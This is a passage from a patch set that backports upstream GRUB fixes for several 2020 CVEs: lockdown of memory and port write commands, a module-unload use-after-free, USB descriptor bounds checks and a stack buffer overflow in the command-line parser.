18Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
19
20Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=8f73052885892bc0dbc01e297f79d7cf4925e491]
21CVE: CVE-2020-14372
22Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
23---
24 docs/grub.texi | 10 ++++++++++
25 grub-core/commands/i386/wrmsr.c | 5 +++--
26 grub-core/commands/iorw.c | 19 ++++++++++---------
27 grub-core/commands/memrw.c | 19 ++++++++++---------
28 4 files changed, 33 insertions(+), 20 deletions(-)
29
30diff --git a/docs/grub.texi b/docs/grub.texi
31index 5e6cace..0786427 100644
32--- a/docs/grub.texi
33+++ b/docs/grub.texi
34@@ -5256,6 +5256,9 @@ only applies to the particular cpu/core/thread that runs the command.
35 Also, if you specify a reserved or unimplemented MSR address, it will
36 cause a general protection exception (which is not currently being handled)
37 and the system will reboot.
38+
39+Note: The command is not allowed when lockdown is enforced (@pxref{Lockdown}).
40+ This is done to prevent subverting various security mechanisms.
41 @end deffn
42
43 @node xen_hypervisor
44@@ -5758,6 +5761,13 @@ security reasons. All above mentioned requirements are enforced by the
45 shim_lock module. And itself it is a persistent module which means that
46 it cannot be unloaded if it was loaded into the memory.
47
48+All GRUB modules not stored in the @file{core.img}, OS kernels, ACPI tables,
49+Device Trees, etc. have to be signed, e.g, using PGP. Additionally, the commands
50+that can be used to subvert the UEFI secure boot mechanism, such as @command{iorw}
51+and @command{memrw} will not be available when the UEFI secure boot is enabled.
52+This is done for security reasons and are enforced by the GRUB Lockdown mechanism
53+(@pxref{Lockdown}).
54+
55 @node Measured Boot
56 @section Measuring boot components
57
58diff --git a/grub-core/commands/i386/wrmsr.c b/grub-core/commands/i386/wrmsr.c
59index 9c5e510..56a29c2 100644
60--- a/grub-core/commands/i386/wrmsr.c
61+++ b/grub-core/commands/i386/wrmsr.c
62@@ -24,6 +24,7 @@
63 #include <grub/env.h>
64 #include <grub/command.h>
65 #include <grub/extcmd.h>
66+#include <grub/lockdown.h>
67 #include <grub/i18n.h>
68 #include <grub/i386/cpuid.h>
69 #include <grub/i386/wrmsr.h>
70@@ -83,8 +84,8 @@ grub_cmd_msr_write (grub_command_t cmd __attribute__ ((unused)), int argc, char
71
72 GRUB_MOD_INIT(wrmsr)
73 {
74- cmd_write = grub_register_command ("wrmsr", grub_cmd_msr_write, N_("ADDR VALUE"),
75- N_("Write a value to a CPU model specific register."));
76+ cmd_write = grub_register_command_lockdown ("wrmsr", grub_cmd_msr_write, N_("ADDR VALUE"),
77+ N_("Write a value to a CPU model specific register."));
78 }
79
80 GRUB_MOD_FINI(wrmsr)
81diff --git a/grub-core/commands/iorw.c b/grub-core/commands/iorw.c
82index a0c164e..584baec 100644
83--- a/grub-core/commands/iorw.c
84+++ b/grub-core/commands/iorw.c
85@@ -23,6 +23,7 @@
86 #include <grub/env.h>
87 #include <grub/cpu/io.h>
88 #include <grub/i18n.h>
89+#include <grub/lockdown.h>
90
91 GRUB_MOD_LICENSE ("GPLv3+");
92
93@@ -131,17 +132,17 @@ GRUB_MOD_INIT(memrw)
94 N_("PORT"), N_("Read 32-bit value from PORT."),
95 options);
96 cmd_write_byte =
97- grub_register_command ("outb", grub_cmd_write,
98- N_("PORT VALUE [MASK]"),
99- N_("Write 8-bit VALUE to PORT."));
100+ grub_register_command_lockdown ("outb", grub_cmd_write,
101+ N_("PORT VALUE [MASK]"),
102+ N_("Write 8-bit VALUE to PORT."));
103 cmd_write_word =
104- grub_register_command ("outw", grub_cmd_write,
105- N_("PORT VALUE [MASK]"),
106- N_("Write 16-bit VALUE to PORT."));
107+ grub_register_command_lockdown ("outw", grub_cmd_write,
108+ N_("PORT VALUE [MASK]"),
109+ N_("Write 16-bit VALUE to PORT."));
110 cmd_write_dword =
111- grub_register_command ("outl", grub_cmd_write,
112- N_("ADDR VALUE [MASK]"),
113- N_("Write 32-bit VALUE to PORT."));
114+ grub_register_command_lockdown ("outl", grub_cmd_write,
115+ N_("ADDR VALUE [MASK]"),
116+ N_("Write 32-bit VALUE to PORT."));
117 }
118
119 GRUB_MOD_FINI(memrw)
120diff --git a/grub-core/commands/memrw.c b/grub-core/commands/memrw.c
121index 98769ea..d401a6d 100644
122--- a/grub-core/commands/memrw.c
123+++ b/grub-core/commands/memrw.c
124@@ -22,6 +22,7 @@
125 #include <grub/extcmd.h>
126 #include <grub/env.h>
127 #include <grub/i18n.h>
128+#include <grub/lockdown.h>
129
130 GRUB_MOD_LICENSE ("GPLv3+");
131
132@@ -133,17 +134,17 @@ GRUB_MOD_INIT(memrw)
133 N_("ADDR"), N_("Read 32-bit value from ADDR."),
134 options);
135 cmd_write_byte =
136- grub_register_command ("write_byte", grub_cmd_write,
137- N_("ADDR VALUE [MASK]"),
138- N_("Write 8-bit VALUE to ADDR."));
139+ grub_register_command_lockdown ("write_byte", grub_cmd_write,
140+ N_("ADDR VALUE [MASK]"),
141+ N_("Write 8-bit VALUE to ADDR."));
142 cmd_write_word =
143- grub_register_command ("write_word", grub_cmd_write,
144- N_("ADDR VALUE [MASK]"),
145- N_("Write 16-bit VALUE to ADDR."));
146+ grub_register_command_lockdown ("write_word", grub_cmd_write,
147+ N_("ADDR VALUE [MASK]"),
148+ N_("Write 16-bit VALUE to ADDR."));
149 cmd_write_dword =
150- grub_register_command ("write_dword", grub_cmd_write,
151- N_("ADDR VALUE [MASK]"),
152- N_("Write 32-bit VALUE to ADDR."));
153+ grub_register_command_lockdown ("write_dword", grub_cmd_write,
154+ N_("ADDR VALUE [MASK]"),
155+ N_("Write 32-bit VALUE to ADDR."));
156 }
157
158 GRUB_MOD_FINI(memrw)
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-25632.patch b/meta/recipes-bsp/grub/files/CVE-2020-25632.patch
new file mode 100644
index 0000000000..0b37c72f0f
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-25632.patch
@@ -0,0 +1,90 @@
1From 7630ec5397fe418276b360f9011934b8c034936c Mon Sep 17 00:00:00 2001
2From: Javier Martinez Canillas <javierm@redhat.com>
3Date: Tue, 29 Sep 2020 14:08:55 +0200
4Subject: [PATCH] dl: Only allow unloading modules that are not dependencies
5
6When a module is attempted to be removed its reference counter is always
7decremented. This means that repeated rmmod invocations will cause the
8module to be unloaded even if another module depends on it.
9
10This may lead to a use-after-free scenario allowing an attacker to execute
11arbitrary code and by-pass the UEFI Secure Boot protection.
12
13While being there, add the extern keyword to some function declarations in
14that header file.
15
16Fixes: CVE-2020-25632
17
18Reported-by: Chris Coulson <chris.coulson@canonical.com>
19Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
20Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
21
22Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=7630ec5397fe418276b360f9011934b8c034936c]
23CVE: CVE-2020-25632
24Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
25---
26 grub-core/commands/minicmd.c | 7 +++++--
27 grub-core/kern/dl.c | 9 +++++++++
28 include/grub/dl.h | 8 +++++---
29 3 files changed, 19 insertions(+), 5 deletions(-)
30
31diff --git a/grub-core/commands/minicmd.c b/grub-core/commands/minicmd.c
32index 6bbce3128..fa498931e 100644
33--- a/grub-core/commands/minicmd.c
34+++ b/grub-core/commands/minicmd.c
35@@ -140,8 +140,11 @@ grub_mini_cmd_rmmod (struct grub_command *cmd __attribute__ ((unused)),
36 if (grub_dl_is_persistent (mod))
37 return grub_error (GRUB_ERR_BAD_ARGUMENT, "cannot unload persistent module");
38
39- if (grub_dl_unref (mod) <= 0)
40- grub_dl_unload (mod);
41+ if (grub_dl_ref_count (mod) > 1)
42+ return grub_error (GRUB_ERR_BAD_ARGUMENT, "cannot unload referenced module");
43+
44+ grub_dl_unref (mod);
45+ grub_dl_unload (mod);
46
47 return 0;
48 }
49diff --git a/grub-core/kern/dl.c b/grub-core/kern/dl.c
50index 48eb5e7b6..48f8a7907 100644
51--- a/grub-core/kern/dl.c
52+++ b/grub-core/kern/dl.c
53@@ -549,6 +549,15 @@ grub_dl_unref (grub_dl_t mod)
54 return --mod->ref_count;
55 }
56
57+int
58+grub_dl_ref_count (grub_dl_t mod)
59+{
60+ if (mod == NULL)
61+ return 0;
62+
63+ return mod->ref_count;
64+}
65+
66 static void
67 grub_dl_flush_cache (grub_dl_t mod)
68 {
69diff --git a/include/grub/dl.h b/include/grub/dl.h
70index f03c03561..b3753c9ca 100644
71--- a/include/grub/dl.h
72+++ b/include/grub/dl.h
73@@ -203,9 +203,11 @@ grub_dl_t EXPORT_FUNC(grub_dl_load) (const char *name);
74 grub_dl_t grub_dl_load_core (void *addr, grub_size_t size);
75 grub_dl_t EXPORT_FUNC(grub_dl_load_core_noinit) (void *addr, grub_size_t size);
76 int EXPORT_FUNC(grub_dl_unload) (grub_dl_t mod);
77-void grub_dl_unload_unneeded (void);
78-int EXPORT_FUNC(grub_dl_ref) (grub_dl_t mod);
79-int EXPORT_FUNC(grub_dl_unref) (grub_dl_t mod);
80+extern void grub_dl_unload_unneeded (void);
81+extern int EXPORT_FUNC(grub_dl_ref) (grub_dl_t mod);
82+extern int EXPORT_FUNC(grub_dl_unref) (grub_dl_t mod);
83+extern int EXPORT_FUNC(grub_dl_ref_count) (grub_dl_t mod);
84+
85 extern grub_dl_t EXPORT_VAR(grub_dl_head);
86
87 #ifndef GRUB_UTIL
88--
892.33.0
90
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-25647.patch b/meta/recipes-bsp/grub/files/CVE-2020-25647.patch
new file mode 100644
index 0000000000..cb77fd4772
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-25647.patch
@@ -0,0 +1,119 @@
1From 128c16a682034263eb519c89bc0934eeb6fa8cfa Mon Sep 17 00:00:00 2001
2From: Javier Martinez Canillas <javierm@redhat.com>
3Date: Fri, 11 Dec 2020 19:19:21 +0100
4Subject: [PATCH] usb: Avoid possible out-of-bound accesses caused by malicious
5 devices
6
7The maximum number of configurations and interfaces are fixed but there is
8no out-of-bound checking to prevent a malicious USB device to report large
9values for these and cause accesses outside the arrays' memory.
10
11Fixes: CVE-2020-25647
12
13Reported-by: Joseph Tartaro <joseph.tartaro@ioactive.com>
14Reported-by: Ilja Van Sprundel <ivansprundel@ioactive.com>
15Signed-off-by: Javier Martinez Canillas <javierm@redhat.com>
16Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
17
18Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?id=128c16a682034263eb519c89bc0934eeb6fa8cfa]
19CVE: CVE-2020-25647
20Signed-off-by: Marta Rybczynska <marta.rybczynska@huawei.com>
21---
22 grub-core/bus/usb/usb.c | 15 ++++++++++++---
23 include/grub/usb.h | 10 +++++++---
24 2 files changed, 19 insertions(+), 6 deletions(-)
25
26diff --git a/grub-core/bus/usb/usb.c b/grub-core/bus/usb/usb.c
27index 8da5e4c74..7cb3cc230 100644
28--- a/grub-core/bus/usb/usb.c
29+++ b/grub-core/bus/usb/usb.c
30@@ -75,6 +75,9 @@ grub_usb_controller_iterate (grub_usb_controller_iterate_hook_t hook,
31 grub_usb_err_t
32 grub_usb_clear_halt (grub_usb_device_t dev, int endpoint)
33 {
34+ if (endpoint >= GRUB_USB_MAX_TOGGLE)
35+ return GRUB_USB_ERR_BADDEVICE;
36+
37 dev->toggle[endpoint] = 0;
38 return grub_usb_control_msg (dev, (GRUB_USB_REQTYPE_OUT
39 | GRUB_USB_REQTYPE_STANDARD
40@@ -134,10 +137,10 @@ grub_usb_device_initialize (grub_usb_device_t dev)
41 return err;
42 descdev = &dev->descdev;
43
44- for (i = 0; i < 8; i++)
45+ for (i = 0; i < GRUB_USB_MAX_CONF; i++)
46 dev->config[i].descconf = NULL;
47
48- if (descdev->configcnt == 0)
49+ if (descdev->configcnt == 0 || descdev->configcnt > GRUB_USB_MAX_CONF)
50 {
51 err = GRUB_USB_ERR_BADDEVICE;
52 goto fail;
53@@ -172,6 +175,12 @@ grub_usb_device_initialize (grub_usb_device_t dev)
54 /* Skip the configuration descriptor. */
55 pos = dev->config[i].descconf->length;
56
57+ if (dev->config[i].descconf->numif > GRUB_USB_MAX_IF)
58+ {
59+ err = GRUB_USB_ERR_BADDEVICE;
60+ goto fail;
61+ }
62+
63 /* Read all interfaces. */
64 for (currif = 0; currif < dev->config[i].descconf->numif; currif++)
65 {
66@@ -217,7 +226,7 @@ grub_usb_device_initialize (grub_usb_device_t dev)
67
68 fail:
69
70- for (i = 0; i < 8; i++)
71+ for (i = 0; i < GRUB_USB_MAX_CONF; i++)
72 grub_free (dev->config[i].descconf);
73
74 return err;
75diff --git a/include/grub/usb.h b/include/grub/usb.h
76index 512ae1dd0..6475c552f 100644
77--- a/include/grub/usb.h
78+++ b/include/grub/usb.h
79@@ -23,6 +23,10 @@
80 #include <grub/usbdesc.h>
81 #include <grub/usbtrans.h>
82
83+#define GRUB_USB_MAX_CONF 8
84+#define GRUB_USB_MAX_IF 32
85+#define GRUB_USB_MAX_TOGGLE 256
86+
87 typedef struct grub_usb_device *grub_usb_device_t;
88 typedef struct grub_usb_controller *grub_usb_controller_t;
89 typedef struct grub_usb_controller_dev *grub_usb_controller_dev_t;
90@@ -167,7 +171,7 @@ struct grub_usb_configuration
91 struct grub_usb_desc_config *descconf;
92
93 /* Interfaces associated to this configuration. */
94- struct grub_usb_interface interf[32];
95+ struct grub_usb_interface interf[GRUB_USB_MAX_IF];
96 };
97
98 struct grub_usb_hub_port
99@@ -191,7 +195,7 @@ struct grub_usb_device
100 struct grub_usb_controller controller;
101
102 /* Device configurations (after opening the device). */
103- struct grub_usb_configuration config[8];
104+ struct grub_usb_configuration config[GRUB_USB_MAX_CONF];
105
106 /* Device address. */
107 int addr;
108@@ -203,7 +207,7 @@ struct grub_usb_device
109 int initialized;
110
111 /* Data toggle values (used for bulk transfers only). */
112- int toggle[256];
113+ int toggle[GRUB_USB_MAX_TOGGLE];
114
115 /* Used by libusb wrapper. Schedulded for removal. */
116 void *data;
117--
1182.33.0
119
diff --git a/meta/recipes-bsp/grub/files/CVE-2020-27749.patch b/meta/recipes-bsp/grub/files/CVE-2020-27749.patch
new file mode 100644
index 0000000000..a2566b2ded
--- /dev/null
+++ b/meta/recipes-bsp/grub/files/CVE-2020-27749.patch
@@ -0,0 +1,609 @@
1From 4ea7bae51f97e49c84dc67ea30b466ca8633b9f6 Mon Sep 17 00:00:00 2001
2From: Chris Coulson <chris.coulson@canonical.com>
3Date: Thu, 7 Jan 2021 19:21:03 +0000
4Subject: kern/parser: Fix a stack buffer overflow
5
6grub_parser_split_cmdline() expands variable names present in the supplied
7command line in to their corresponding variable contents and uses a 1 kiB
8stack buffer for temporary storage without sufficient bounds checking. If
9the function is called with a command line that references a variable with
10a sufficiently large payload, it is possible to overflow the stack
11buffer via tab completion, corrupt the stack frame and potentially
12control execution.
13
14Fixes: CVE-2020-27749
15
16Reported-by: Chris Coulson <chris.coulson@canonical.com>
17Signed-off-by: Chris Coulson <chris.coulson@canonical.com>
18Signed-off-by: Darren Kenny <darren.kenny@oracle.com>
19Reviewed-by: Daniel Kiper <daniel.kiper@oracle.com>
20
21Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=c6c426e5ab6ea715153b72584de6bd8c82f698ec && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=b1c9e9e889e4273fb15712051c887e6078511448 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=3d157bbd06506b170fde5ec23980c4bf9f7660e2 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=8bc817014ce3d7a498db44eae33c8b90e2430926 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=030fb6c4fa354cdbd6a8d6903dfed5d36eaf3cb2 && https://git.savannah.gnu.org/cgit/grub.git/commit/?h=grub-2.06&id=4ea7bae51f97e49c84dc67ea30b466ca8633b9f6]
22CVE: CVE-2020-27749
23
24Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
25---
26 grub-core/Makefile.core.def | 1 +
27 grub-core/kern/buffer.c | 117 +++++++++++++++++++++
28 grub-core/kern/parser.c | 204 +++++++++++++++++++++++-------------
29 include/grub/buffer.h | 144 +++++++++++++++++++++++++
30 4 files changed, 395 insertions(+), 71 deletions(-)
31 create mode 100644 grub-core/kern/buffer.c
32 create mode 100644 include/grub/buffer.h
33
34diff --git a/grub-core/Makefile.core.def b/grub-core/Makefile.core.def
35index 651ea2a..823cd57 100644
36--- a/grub-core/Makefile.core.def
37+++ b/grub-core/Makefile.core.def
38@@ -123,6 +123,7 @@ kernel = {
39 riscv32_efi_startup = kern/riscv/efi/startup.S;
40 riscv64_efi_startup = kern/riscv/efi/startup.S;
41
42+ common = kern/buffer.c;
43 common = kern/command.c;
44 common = kern/corecmd.c;
45 common = kern/device.c;
46diff --git a/grub-core/kern/buffer.c b/grub-core/kern/buffer.c
47new file mode 100644
48index 0000000..9f5f8b8
49--- /dev/null
50+++ b/grub-core/kern/buffer.c
51@@ -0,0 +1,117 @@
52+/*
53+ * GRUB -- GRand Unified Bootloader
54+ * Copyright (C) 2021 Free Software Foundation, Inc.
55+ *
56+ * GRUB is free software: you can redistribute it and/or modify
57+ * it under the terms of the GNU General Public License as published by
58+ * the Free Software Foundation, either version 3 of the License, or
59+ * (at your option) any later version.
60+ *
61+ * GRUB is distributed in the hope that it will be useful,
62+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
63+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
64+ * GNU General Public License for more details.
65+ *
66+ * You should have received a copy of the GNU General Public License
67+ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
68+ */
69+
70+#include <grub/buffer.h>
71+#include <grub/err.h>
72+#include <grub/misc.h>
73+#include <grub/mm.h>
74+#include <grub/safemath.h>
75+#include <grub/types.h>
76+
77+grub_buffer_t
78+grub_buffer_new (grub_size_t sz)
79+{
80+ struct grub_buffer *ret;
81+
82+ ret = (struct grub_buffer *) grub_malloc (sizeof (*ret));
83+ if (ret == NULL)
84+ return NULL;
85+
86+ ret->data = (grub_uint8_t *) grub_malloc (sz);
87+ if (ret->data == NULL)
88+ {
89+ grub_free (ret);
90+ return NULL;
91+ }
92+
93+ ret->sz = sz;
94+ ret->pos = 0;
95+ ret->used = 0;
96+
97+ return ret;
98+}
99+
100+void
101+grub_buffer_free (grub_buffer_t buf)
102+{
103+ grub_free (buf->data);
104+ grub_free (buf);
105+}
106+
107+grub_err_t
108+grub_buffer_ensure_space (grub_buffer_t buf, grub_size_t req)
109+{
110+ grub_uint8_t *d;
111+ grub_size_t newsz = 1;
112+
113+ /* Is the current buffer size adequate? */
114+ if (buf->sz >= req)
115+ return GRUB_ERR_NONE;
116+
117+ /* Find the smallest power-of-2 size that satisfies the request. */
118+ while (newsz < req)
119+ {
120+ if (newsz == 0)
121+ return grub_error (GRUB_ERR_OUT_OF_RANGE,
122+ N_("requested buffer size is too large"));
123+ newsz <<= 1;
124+ }
125+
126+ d = (grub_uint8_t *) grub_realloc (buf->data, newsz);
127+ if (d == NULL)
128+ return grub_errno;
129+
130+ buf->data = d;
131+ buf->sz = newsz;
132+
133+ return GRUB_ERR_NONE;
134+}
135+
136+void *
137+grub_buffer_take_data (grub_buffer_t buf)
138+{
139+ void *data = buf->data;
140+
141+ buf->data = NULL;
142+ buf->sz = buf->pos = buf->used = 0;
143+
144+ return data;
145+}
146+
147+void
148+grub_buffer_reset (grub_buffer_t buf)
149+{
150+ buf->pos = buf->used = 0;
151+}
152+
153+grub_err_t
154+grub_buffer_advance_read_pos (grub_buffer_t buf, grub_size_t n)
155+{
156+ grub_size_t newpos;
157+
158+ if (grub_add (buf->pos, n, &newpos))
159+ return grub_error (GRUB_ERR_OUT_OF_RANGE, N_("overflow is detected"));
160+
161+ if (newpos > buf->used)
162+ return grub_error (GRUB_ERR_OUT_OF_RANGE,
163+ N_("new read is position beyond the end of the written data"));
164+
165+ buf->pos = newpos;
166+
167+ return GRUB_ERR_NONE;
168+}
169diff --git a/grub-core/kern/parser.c b/grub-core/kern/parser.c
170index d1cf061..6ab7aa4 100644
171--- a/grub-core/kern/parser.c
172+++ b/grub-core/kern/parser.c
173@@ -1,7 +1,7 @@
174 /* parser.c - the part of the parser that can return partial tokens */
175 /*
176 * GRUB -- GRand Unified Bootloader
177- * Copyright (C) 2005,2007,2009 Free Software Foundation, Inc.
178+ * Copyright (C) 2005,2007,2009,2021 Free Software Foundation, Inc.
179 *
180 * GRUB is free software: you can redistribute it and/or modify
181 * it under the terms of the GNU General Public License as published by
182@@ -18,6 +18,7 @@
183 */
184
185 #include <grub/parser.h>
186+#include <grub/buffer.h>
187 #include <grub/env.h>
188 #include <grub/misc.h>
189 #include <grub/mm.h>
190@@ -107,8 +108,8 @@ check_varstate (grub_parser_state_t s)
191 }
192
193
194-static void
195-add_var (char *varname, char **bp, char **vp,
196+static grub_err_t
197+add_var (grub_buffer_t varname, grub_buffer_t buf,
198 grub_parser_state_t state, grub_parser_state_t newstate)
199 {
200 const char *val;
201@@ -116,17 +117,74 @@ add_var (char *varname, char **bp, char **vp,
202 /* Check if a variable was being read in and the end of the name
203 was reached. */
204 if (!(check_varstate (state) && !check_varstate (newstate)))
205- return;
206+ return GRUB_ERR_NONE;
207+
208+ if (grub_buffer_append_char (varname, '\0') != GRUB_ERR_NONE)
209+ return grub_errno;
210
211- *((*vp)++) = '\0';
212- val = grub_env_get (varname);
213- *vp = varname;
214+ val = grub_env_get ((const char *) grub_buffer_peek_data (varname));
215+ grub_buffer_reset (varname);
216 if (!val)
217- return;
218+ return GRUB_ERR_NONE;
219
220 /* Insert the contents of the variable in the buffer. */
221- for (; *val; val++)
222- *((*bp)++) = *val;
223+ return grub_buffer_append_data (buf, val, grub_strlen (val));
224+}
225+
226+static grub_err_t
227+terminate_arg (grub_buffer_t buffer, int *argc)
228+{
229+ grub_size_t unread = grub_buffer_get_unread_bytes (buffer);
230+
231+ if (unread == 0)
232+ return GRUB_ERR_NONE;
233+
234+ if (*(const char *) grub_buffer_peek_data_at (buffer, unread - 1) == '\0')
235+ return GRUB_ERR_NONE;
236+
237+ if (grub_buffer_append_char (buffer, '\0') != GRUB_ERR_NONE)
238+ return grub_errno;
239+
240+ (*argc)++;
241+
242+ return GRUB_ERR_NONE;
243+}
244+
245+static grub_err_t
246+process_char (char c, grub_buffer_t buffer, grub_buffer_t varname,
247+ grub_parser_state_t state, int *argc,
248+ grub_parser_state_t *newstate)
249+{
250+ char use;
251+
252+ *newstate = grub_parser_cmdline_state (state, c, &use);
253+
254+ /*
255+ * If a variable was being processed and this character does
256+ * not describe the variable anymore, write the variable to
257+ * the buffer.
258+ */
259+ if (add_var (varname, buffer, state, *newstate) != GRUB_ERR_NONE)
260+ return grub_errno;
261+
262+ if (check_varstate (*newstate))
263+ {
264+ if (use)
265+ return grub_buffer_append_char (varname, use);
266+ }
267+ else if (*newstate == GRUB_PARSER_STATE_TEXT &&
268+ state != GRUB_PARSER_STATE_ESC && grub_isspace (use))
269+ {
270+ /*
271+ * Don't add more than one argument if multiple
272+ * spaces are used.
273+ */
274+ return terminate_arg (buffer, argc);
275+ }
276+ else if (use)
277+ return grub_buffer_append_char (buffer, use);
278+
279+ return GRUB_ERR_NONE;
280 }
281
282 grub_err_t
283@@ -135,24 +193,36 @@ grub_parser_split_cmdline (const char *cmdline,
284 int *argc, char ***argv)
285 {
286 grub_parser_state_t state = GRUB_PARSER_STATE_TEXT;
287- /* XXX: Fixed size buffer, perhaps this buffer should be dynamically
288- allocated. */
289- char buffer[1024];
290- char *bp = buffer;
291+ grub_buffer_t buffer, varname;
292 char *rd = (char *) cmdline;
293- char varname[200];
294- char *vp = varname;
295- char *args;
296+ char *rp = rd;
297 int i;
298
299 *argc = 0;
300 *argv = NULL;
301+
302+ buffer = grub_buffer_new (1024);
303+ if (buffer == NULL)
304+ return grub_errno;
305+
306+ varname = grub_buffer_new (200);
307+ if (varname == NULL)
308+ goto fail;
309+
310 do
311 {
312- if (!rd || !*rd)
313+ if (rp == NULL || *rp == '\0')
314 {
315+ if (rd != cmdline)
316+ {
317+ grub_free (rd);
318+ rd = rp = NULL;
319+ }
320 if (getline)
321- getline (&rd, 1, getline_data);
322+ {
323+ getline (&rd, 1, getline_data);
324+ rp = rd;
325+ }
326 else
327 break;
328 }
329@@ -160,39 +230,14 @@ grub_parser_split_cmdline (const char *cmdline,
330 if (!rd)
331 break;
332
333- for (; *rd; rd++)
334+ for (; *rp != '\0'; rp++)
335 {
336 grub_parser_state_t newstate;
337- char use;
338
339- newstate = grub_parser_cmdline_state (state, *rd, &use);
340+ if (process_char (*rp, buffer, varname, state, argc,
341+ &newstate) != GRUB_ERR_NONE)
342+ goto fail;
343
344- /* If a variable was being processed and this character does
345- not describe the variable anymore, write the variable to
346- the buffer. */
347- add_var (varname, &bp, &vp, state, newstate);
348-
349- if (check_varstate (newstate))
350- {
351- if (use)
352- *(vp++) = use;
353- }
354- else
355- {
356- if (newstate == GRUB_PARSER_STATE_TEXT
357- && state != GRUB_PARSER_STATE_ESC && grub_isspace (use))
358- {
359- /* Don't add more than one argument if multiple
360- spaces are used. */
361- if (bp != buffer && *(bp - 1))
362- {
363- *(bp++) = '\0';
364- (*argc)++;
365- }
366- }
367- else if (use)
368- *(bp++) = use;
369- }
370 state = newstate;
371 }
372 }
373@@ -200,43 +245,60 @@ grub_parser_split_cmdline (const char *cmdline,
374
375 /* A special case for when the last character was part of a
376 variable. */
377- add_var (varname, &bp, &vp, state, GRUB_PARSER_STATE_TEXT);
378+ if (add_var (varname, buffer, state, GRUB_PARSER_STATE_TEXT) != GRUB_ERR_NONE)
379+ goto fail;
380
381- if (bp != buffer && *(bp - 1))
382- {
383- *(bp++) = '\0';
384- (*argc)++;
385- }
386+ /* Ensure that the last argument is terminated. */
387+ if (terminate_arg (buffer, argc) != GRUB_ERR_NONE)
388+ goto fail;
389
390 /* If there are no args, then we're done. */
391 if (!*argc)
392- return 0;
393-
394- /* Reserve memory for the return values. */
395- args = grub_malloc (bp - buffer);
396- if (!args)
397- return grub_errno;
398- grub_memcpy (args, buffer, bp - buffer);
399+ {
400+ grub_errno = GRUB_ERR_NONE;
401+ goto out;
402+ }
403
404 *argv = grub_calloc (*argc + 1, sizeof (char *));
405 if (!*argv)
406- {
407- grub_free (args);
408- return grub_errno;
409- }
410+ goto fail;
411
412 /* The arguments are separated with 0's, setup argv so it points to
413 the right values. */
414- bp = args;
415 for (i = 0; i < *argc; i++)
416 {
417- (*argv)[i] = bp;
418- while (*bp)
419- bp++;
420- bp++;
421+ char *arg;
422+
423+ if (i > 0)
424+ {
425+ if (grub_buffer_advance_read_pos (buffer, 1) != GRUB_ERR_NONE)
426+ goto fail;
427+ }
428+
429+ arg = (char *) grub_buffer_peek_data (buffer);
430+ if (arg == NULL ||
431+ grub_buffer_advance_read_pos (buffer, grub_strlen (arg)) != GRUB_ERR_NONE)
432+ goto fail;
433+
434+ (*argv)[i] = arg;
435 }
436
437- return 0;
438+ /* Keep memory for the return values. */
439+ grub_buffer_take_data (buffer);
440+
441+ grub_errno = GRUB_ERR_NONE;
442+
443+ out:
444+ if (rd != cmdline)
445+ grub_free (rd);
446+ grub_buffer_free (buffer);
447+ grub_buffer_free (varname);
448+
449+ return grub_errno;
450+
451+ fail:
452+ grub_free (*argv);
453+ goto out;
454 }
455
456 /* Helper for grub_parser_execute. */
457diff --git a/include/grub/buffer.h b/include/grub/buffer.h
458new file mode 100644
459index 0000000..f4b10cf
460--- /dev/null
461+++ b/include/grub/buffer.h
462@@ -0,0 +1,144 @@
463+/*
464+ * GRUB -- GRand Unified Bootloader
465+ * Copyright (C) 2021 Free Software Foundation, Inc.
466+ *
467+ * GRUB is free software: you can redistribute it and/or modify
468+ * it under the terms of the GNU General Public License as published by
469+ * the Free Software Foundation, either version 3 of the License, or
470+ * (at your option) any later version.
471+ *
472+ * GRUB is distributed in the hope that it will be useful,
473+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
474+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
475+ * GNU General Public License for more details.
476+ *
477+ * You should have received a copy of the GNU General Public License
478+ * along with GRUB. If not, see <http://www.gnu.org/licenses/>.
479+ */
480+
481+#ifndef GRUB_BUFFER_H
482+#define GRUB_BUFFER_H 1
483+
484+#include <grub/err.h>
485+#include <grub/misc.h>
486+#include <grub/mm.h>
487+#include <grub/safemath.h>
488+#include <grub/types.h>
489+
490+struct grub_buffer
491+{
492+ grub_uint8_t *data;
493+ grub_size_t sz;
494+ grub_size_t pos;
495+ grub_size_t used;
496+};
497+
498+/*
499+ * grub_buffer_t represents a simple variable sized byte buffer with
500+ * read and write cursors. It currently only implements
501+ * functionality required by the only user in GRUB (append byte[s],
502+ * peeking data at a specified position and updating the read cursor.
503+ * Some things that this doesn't do yet are:
504+ * - Reading a portion of the buffer by copying data from the current
505+ * read position in to a caller supplied destination buffer and then
506+ * automatically updating the read cursor.
507+ * - Dropping the read part at the start of the buffer when an append
508+ * requires more space.
509+ */
510+typedef struct grub_buffer *grub_buffer_t;
511+
512+/* Allocate a new buffer with the specified initial size. */
513+extern grub_buffer_t grub_buffer_new (grub_size_t sz);
514+
515+/* Free the buffer and its resources. */
516+extern void grub_buffer_free (grub_buffer_t buf);
517+
518+/* Return the number of unread bytes in this buffer. */
519+static inline grub_size_t
520+grub_buffer_get_unread_bytes (grub_buffer_t buf)
521+{
522+ return buf->used - buf->pos;
523+}
524+
525+/*
